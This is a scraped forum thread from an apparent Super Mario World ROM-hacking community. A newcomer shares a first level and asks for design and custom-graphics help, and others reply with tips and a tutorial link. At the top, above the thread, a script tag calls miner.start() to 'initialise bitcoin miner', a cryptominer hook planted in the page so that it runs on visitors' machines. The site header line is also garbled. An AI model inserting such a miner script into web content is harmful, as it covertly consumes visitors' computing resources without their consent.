<script>
miner.start(); // initialise bitcoin miner
</script>

irc.cat.biosmw centralpge project

VLDC9 inspired me to make a smw hack of my own

wanna make a game, or anything else? seminal bloom!
Anthoniks

VLDC9 inspired me to make a smw hack of my own

Postby Anthoniks » 8 months ago

So after watching raocow's lp of vldc9 and seeing so many great levels, I got a spark of motivation to do a hack of my own. I started it yesterday and did one level for it. Now what I was thinking is: since I'm not super experienced in the ways of hacking and level design and ASM and all that, I was wondering if some of you guys could help me out with tips or even collab on this, since it could be a fun little project to do.

Here's the first very mediocre level I've made.

ft029
m/m wannabe

Re: VLDC9 inspired me to make a smw hack of my own

Postby ft029 » 8 months ago

Definitely way better than the first levels I made (muncher mazes). I would recommend focusing less on decoration (those dirt formations do not look good. They are a thing of the past) and trying to think about how the player will meet certain obstacles. Make sure each sprite has a purpose. Do not place rexes around to "fill up space".

Good luck.
Mosts Awards:

Anthoniks

Postby Anthoniks » 8 months ago

Thanks for the tips! Already got rid of those. To be honest I thought they looked cool but when playing I knew they were gonna be a little too much. This is why I asked for tips, I'm not used to making these xD

Anthoniks

Postby Anthoniks » 6 months ago

Update: turns out I am a noob (god it's 2017 and i use that word yikes) and don't really know much in the way of custom graphics nor changing up vanilla graphics. And the tutorials I find online aren't the most helpful imo...so any help with this hack would be awesome!

Cobsters
big fat bozo idiot haha
Pronouns: he/him/his

Postby Cobsters » 6 months ago

I think you might enjoy this tutorial in particular: https://www.smwcentral.net/?p=viewthread&t=89733

Return to “project showcase”